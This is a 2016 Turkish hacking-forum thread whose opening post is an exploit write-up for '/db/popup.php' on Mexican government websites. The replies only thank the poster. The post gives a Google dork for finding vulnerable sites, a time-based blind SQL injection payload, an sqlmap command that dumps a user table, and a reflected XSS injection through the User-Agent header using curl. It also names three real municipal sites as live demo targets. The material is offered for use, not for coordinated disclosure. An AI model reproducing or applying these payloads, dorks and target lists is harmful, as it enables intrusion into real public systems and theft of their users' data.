Turkhackteam.net/org - Turkish Hacking & Security Platform...  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform... >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.




"MX '/db/popup.php' Çoklu Zaafiyet #BugResearchers"

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 29-06-2016   #1
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Feb 2012
Yaş
15
Mesajlar
Konular


  
"MX '/db/popup.php' Çoklu Zaafiyet #BugResearchers"


{'MX "/db/popup.php" Multiple Vuln.',
'SQLi/XSS',
'2016/06/29',
'Web App. Security',
'@efeoglu_e'}


Kod:
##
# 0x00 (Exploit Detaylari)
##
# Baslik: Meksika Web Siteleri "/db/popup.php" Coklu Zaafiyet
# Yazar: d3atr4x
# Kategori: Web Aplikasyon Guvenligi
# GHDB Dork: 'site:"gob.mx" inurl:"popup.php?action="'
# Tarih: 2016/06/29
# Iletisim: @efeoglu_e
##

##
# Gr££tz t0: TurkHackTeam.Org/Net
# THT #Bug Researchers
##

###[I. Zaafiyet (SQLi)]###

##
# ~0x10 (Aciklama)
##
# GHDB dorku, Google arama motoru üzerinde aratıldığı zaman
# karşınıza çıkan web aplikasyonlarında bulunan SQLi zaafiyetini
# herhangi bir şekilde sömürebilirsiniz. Zaafiyet, "/db" dizininde
# bulunan "popup.php" dosyasında yer almaktadır. Web aplikasyonunda
# yer alan "Time Based Blind/Error Based SQLi" zaafiyetini herhangi bir araç
# veyahut method yardımı ile sömürebilirsiniz. GET methodu ile
# "poll_ident" parametresinde yer alan verinin direkt sorguya katilmasiyla
# ortaya cikmistir.
##

##
# ~0x20 (PoC)
##
# > "http://www.zaaflisite.gob.mx/db/popup.php?action=results&poll_ident=1 AND (SELECT * FROM (SELECT(SLEEP(5)))iloved3atr4x)"
# > $sudo python2 sqlmap.py -u "http://www.zaaflisite.gob.mx/db/popup.php?action=results&poll_ident=1" -p poll_ident --batch -D [DB] -T ads_usuarios --dump
##

##
# Ayrica arka planda calisan SQL sorgusunu kirdiginiz zaman, karsiniza
# cikan hata mesajinda hedef hakkinda bilgiler yer almaktadir. Bilgi toplama
# safhasinda kullanabilirsiniz. 
##

###[II. Zaafiyet (XSS)]###

##
# ~0x10 (Aciklama)
##
# Arka planda calisan SQLi sorgusu kirildiği taktirde, ortaya çıkan hata mesajında
# HTTP baslik bilgileri yer almaktadir. Bu baslik bilgilerinden biri olan "User-Agent"
# bilgisi değiştirildiği taktirde sayfaya zararli kod enjekte edilebilmektedir. Web 
# sayfasinda yer alan Reflected XSS zaafiyeti somurulebilir.
##

##
# ~0x20 (PoC)
##
# HTTP baslik bilgisinde yer alan "User-Agent" bayragini istediginiz bir kod ile değistirin.
# Zararli Kod Enjektesi Ornegi:
##
# $curl -A 'User-Agent: <sc.ript>alert('iluvd3atr4x');</script>' "http://zaaflisite.gob.mx/db/popup.php?action=results&poll_ident=1%27"
##

##
# 0x30 (Demo)
##
# http://www.tubutama.gob.mx/db/popup.php?action=results&poll_ident=4
# http://www.sonoyta.gob.mx/db/popup.php?action=results&poll_ident=1
# http://www.santacruz.gob.mx/db/popup.php?action=results&poll_ident=1
##

##
# d3atr4x sundu..
##
    

Konu Par4d0x1D tarafından (29-06-2016 Saat 13:55 ) değiştirilmiştir..
Offline
 
Alıntı ile Cevapla
Alt 29-06-2016   #2
  • Offline
  • Teğmen
  • Genel Bilgiler
Üyelik tarihi
Jun 2016
Nereden
Bulamadın
Mesajlar
Konular


  

eline sağlık
    


__________________

Sabahın hayrı şer, şerri hayır gecenin,
Sabahı görüyorsak geldi ayın eceli.
Seviyorken ayrılmak bir garip tecelli,
Ayrıyken sevmeyi de bir biz becerdik.


Alalım en başından, bir musalla taşında,
Yaşam el etek çekmiş tırnağından, saçından.
Tükenmiş neşen de, hasretin de, acın da,
Sapmış beden yaşam amacından.

Offline
 
Alıntı ile Cevapla
Alt 29-06-2016   #3
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Feb 2016
Nereden
[vkng@vkng~]
Yaş
2
Mesajlar
Konular


  

Eline Sağlık
    
Offline
 
Alıntı ile Cevapla
Alt 29-06-2016   #4
  • Offline
  • Tamamen Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Jun 2016
Mesajlar
Konular
3


  

Eline sağlık par
    
Offline
 
Alıntı ile Cevapla
Alt 29-06-2016   #5
  • Offline
  • Turan Ordusu // Anka(Saldırı) Timi
  • Genel Bilgiler
Üyelik tarihi
Jun 2015
Nereden
Nereye
Mesajlar
Konular


  

eline sağlık paradox
    


__________________

TARİHİN TOZLU RAFLARINDA KAYBOLMA O RAFLARA TARİH YAZ !!!

Mümkün Olanı Başarmak İçin İmkansızı Yapmayı Unutma !

Siyah ~ Aslan
Offline
 
Alıntı ile Cevapla
Alt 29-06-2016   #6
  • Offline
  • Tamamen Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Apr 2015
Nereden
İstanbul
Mesajlar
Konular


  

Ellerine sağlık :-)
    
Offline
 
Alıntı ile Cevapla
Alt 29-06-2016   #7
  • Offline
  • Üsteğmen
  • Genel Bilgiler
Üyelik tarihi
May 2016
Mesajlar
Konular


  

eline sağlık
    


__________________

__#############
_##############
#######______###
######________##___##
######_____________###
#####______________######
#####_____________#######
#####____________#######
#####_____________######
#####______________######
######_____________###_##
_######_______#____##
_#######____###
__############
___##########
____######

Offline
 
Alıntı ile Cevapla
Alt 29-06-2016   #8
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
May 2016
Mesajlar
Konular
2


  

Eline Sağlık
    
Offline
 
Alıntı ile Cevapla
Alt 30-06-2016   #9
  • Online
  • Yarbay
  • Genel Bilgiler
Üyelik tarihi
Apr 2015
Nereden
fl3xpl0it
Yaş
17
Mesajlar
Konular


  

Eline emeğine sağlık Par4d0x1D
    


__________________

Brute Force'u bıraktım bunu bir Upload ile kutladım
Online
 
Alıntı ile Cevapla
Alt 02-07-2016   #10
  • Online
  • Yarbay
  • Genel Bilgiler
Üyelik tarihi
Apr 2015
Nereden
Kayseri
Mesajlar
Konular


  

Tebrikler PaR (:
    


__________________

Laf çok kabadır, icraat incelik ister...!
‿❤乂☬❛GonzaLes.•°*”˜シ乂❤‿
Online
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından açılmaktadır.
Bu konular yönetimimiz tarafından takip edilsede gözden kaçabilen telif hakkı olan veya mahkeme kararı çıkmış konular sitemizde bulunabilir. Bu tür konuları bize turkhackteamiletisim [at] gmail.com adresine mail atarak bildirdiğiniz takdirde en kısa sürede konular hakkında gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com


Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz, bu sitelerin güvenlik açıklarını site sahibine bildirmek için çaba sarfeder.
Turkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Turkhackteam sorumlu değildir. Sitelerinize Turkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.




Powered by vBulletin® Copyright ©2000 - 2017

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı



Google Links

Referandum 2017



Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.